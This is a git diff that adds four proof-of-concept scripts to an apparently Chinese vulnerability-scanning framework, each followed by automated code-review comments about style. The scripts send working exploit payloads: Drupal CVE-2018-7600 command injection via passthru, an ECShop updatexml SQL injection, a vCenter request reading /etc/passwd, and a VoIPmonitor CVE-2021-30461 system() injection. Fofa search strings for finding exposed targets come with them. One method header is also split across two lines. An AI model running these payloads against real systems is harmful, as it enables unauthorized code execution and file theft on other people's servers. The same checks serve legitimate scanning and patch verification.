diff --git a/docs/CHANGELOG.md b/docs/CHANGELOG.md
index 7cc7947..b10ea47 100644
--- a/docs/CHANGELOG.md
+++ b/docs/CHANGELOG.md
@@ -716,6 +716,15 @@
 * ``通达OA 计算机名探测插件``
 * ``通达OA 版本探测插件``
+
+## version 2.23.7
+------------------
+> 新增POC:
+* ``Drupal!远程代码执行(CVE-2018-7600)``
+* ``ECShop 4.1.0前台 delete_cart_goods.php SQL注入(CNVD-2020-58823)``
+* ``Vmware vCenter 任意文件读取``
+* ``VoIPmonitor 未授权远程代码执行(CVE-2021-30461)``
+
 ```
 ===============
 |以上为当前版本|
diff --git a/info.ini b/info.ini
index 44e3a46..bcf2bbd 100644
--- a/info.ini
+++ b/info.ini
@@ -1,6 +1,6 @@
 [info]
-version = 2.23.3
+version = 2.23.7
 author = "openx"
diff --git a/poc/Drupal!/RCE_CVE_2018_7600/poc.py b/poc/Drupal!/RCE_CVE_2018_7600/poc.py
new file mode 100644
index 0000000..2c523b1
--- /dev/null
+++ b/poc/Drupal!/RCE_CVE_2018_7600/poc.py
@@ -0,0 +1,73 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2021-06-09", # POC创建时间
+ "UpdateDate" : "2021-06-09", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "Drupal!远程代码执行(CVE-2018-7600)", # 漏洞名称
+ "VulnID" : "CVE-2018-7600", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url0 = self.target + "/exphub.txt"
+ url = self.target + "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" # url自己按需调整
+ data = 'form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=passthru&mail[#type]=markup&mail[#markup]=ls'
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.post(url,data = data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False,allow_redirects=False)
+ if "example.gitignore" in req.text and req.status_code == 200 :
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
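Review bot: `url0 = self.target + "/exphub.txt"` in `_verify` is assigned and never read, and `url_handle` is imported but never used; both are dead code that should be dropped (the same unused import is in the ECShop, vCenter and VoIPmonitor files added by this commit). The `except Exception as e: raise e` block adds nothing except a rewritten traceback origin — either remove the try/except or use a bare `raise`. The triple-quoted string placed as the first statement inside `try` is an expression statement, not a comment; make it a `#` comment so a reader does not mistake it for a docstring. `if self._honeypot_check(vuln[1]) == True:` should be `if self._honeypot_check(vuln[1]):`. These last three points apply to all four new POC files in this commit.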
diff --git a/poc/ECShop/SQLi_delete_cart_goods/poc.py b/poc/ECShop/SQLi_delete_cart_goods/poc.py
new file mode 100644
index 0000000..be2e634
--- /dev/null
+++ b/poc/ECShop/SQLi_delete_cart_goods/poc.py
@@ -0,0 +1,73 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "2", # POC版本,默认是1
+ "CreateDate" : "2021-06-09", # POC创建时间
+ "UpdateDate" : "2021-06-09", # POC创建时间
+ "PocDesc" : """
+ v1 : 略
+ v2 : 小改进
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "ECShop 4.1.0前台 delete_cart_goods.php SQL注入(CNVD-2020-58823)", # 漏洞名称
+ "VulnID" : "CNVD-2020-58823", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "ECShop", # 漏洞应用名称
+ "AppVersion" : "ecshop4.1.0及以下", # 漏洞应用版本
+ "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ app="ECShop"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/delete_cart_goods.php" # url自己按需调整
+ data = "id=0||(updatexml(1,concat(0x7e,(select%20user()),0x7e),1))"
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if "MySQL server error report" in req.text:#req.status_code == 200 and :
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
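Review bot: The condition line `if "MySQL server error report" in req.text:#req.status_code == 200 and :` in `_verify` carries a commented-out fragment of an earlier condition glued onto the live line; either the status-code check was dropped deliberately, in which case the fragment should be deleted, or it was dropped by accident, in which case it should be restored on its own terms. The `PocDesc` entry `v2 : 小改进` does not say what changed between v1 and v2; a version note is only useful if it names the changed behavior. The unused `url_handle` import, the `raise e` re-raise, the string literal used as a comment inside `try` and the `== True` comparison are the same issues raised on the Drupal file in this commit.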
diff --git a/poc/VMware/File_read_vCenter/poc.py b/poc/VMware/File_read_vCenter/poc.py
new file mode 100644
index 0000000..2dd4547
--- /dev/null
+++ b/poc/VMware/File_read_vCenter/poc.py
@@ -0,0 +1,72 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2021-06-09", # POC创建时间
+ "UpdateDate" : "2021-06-09", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "Vmware vCenter 任意文件读取", # 漏洞名称
+ "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "VMware vCenter Server", # 漏洞应用名称
+ "AppVersion" : "VMware vCenter Server 6.5.0a- f 版本", # 漏洞应用版本
+ "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ VMware vCenter特定版本存在任意文件读取漏洞,攻击者通过构造特定的请求,可以读取服务器上任意文件
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ title="ID_VC_Welcome"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/eam/vib?id=/etc/passwd" # url自己按需调整
+
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ # "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if "root:/root" in req.text and req.status_code == 200:
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
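Review bot: `"VulnID" : "oFx-2021-0001"` contradicts the field's own trailing comment (`以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可`), which says to leave the field empty when no CVE or CNVD identifier exists; either the value should be `""` or the comment should be updated to document the project-internal numbering scheme so later authors know which to follow. The commented-out `# "Content-Type": "application/x-www-form-urlencoded",` entry inside `headers` is leftover code on a GET request with no body and should be removed rather than left as a hint. The `AppVersion` value `"VMware vCenter Server 6.5.0a- f 版本"` looks like it has a stray space in the version range; `6.5.0a-f` would read unambiguously, assuming that range is what was intended.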
diff --git a/poc/VoIPmonitor/RCE_CVE_2021_30461/poc.py b/poc/VoIPmonitor/RCE_CVE_2021_30461/poc.py
new file mode 100644
index 0000000..35095bf
--- /dev/null
+++ b/poc/VoIPmonitor/RCE_CVE_2021_30461/poc.py
@@ -0,0 +1,77 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+import re
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "2", # POC版本,默认是1
+ "CreateDate" : "2021-06-09", # POC创建时间
+ "UpdateDate" : "2021-06-09", # POC创建时间
+ "PocDesc" : """
+ v1 : 略
+ v2 : 改成了正则匹配的模式,有效降低了误报率
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "VoIPmonitor 未授权远程代码执行(CVE-2021-30461)", # 漏洞名称
+ "VulnID" : "CVE-2021-30461", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "VoIPmonitor", # 漏洞应用名称
+ "AppVersion" : "VoIPmonitor < 24.60", # 漏洞应用版本
+ "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ VoIPmonitor 是开源网络数据包嗅探器,具有商业前端,用于在 linux 上运行的 SIP RTP RTCP SKINNY(SCCP) MGCP WebRTC VoIP 协议。
+ VoIPmonitor的index.php文件中接受未授权用户提交的未经验证的参数值并将之写进了配置文件中,该配置文件在index.php代码下文中被require_once函数包含,从而导致任意代码执行
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ title="VoIPmonitor"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/index.php" # url自己按需调整
+
+ data = """SPOOLDIR=test".system("id")."&recheck=annen"""
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False,allow_redirects=False)
+ result = re.search("uid=\d+\(.+\) gid=\d+\(.+\) groups=\d+\(.+\)",req.text.strip())
+ if result and req.text:
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def 
_attack(self):
+ return self._verify()
\ No newline at end of file
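Review bot: The pattern passed to `re.search` in `_verify` is a plain (non-raw) string containing `\d` and `\(`, which are invalid escape sequences in Python string literals and produce a SyntaxWarning on 3.12+ (a DeprecationWarning before that); it should be written as a raw string, `r"uid=\d+\(.+\) gid=\d+\(.+\) groups=\d+\(.+\)"`. The guard `if result and req.text:` is redundant because a non-`None` match already implies a non-empty body, so `if result:` states the intent more plainly. In this rendering the `def _attack(self):` line is broken across two physical lines; the raw patch should be checked to confirm the method header is intact. The `url_handle` import, the `raise e` re-raise, the string literal used as a comment inside `try` and the `== True` comparison are the same issues raised on the Drupal file in this commit.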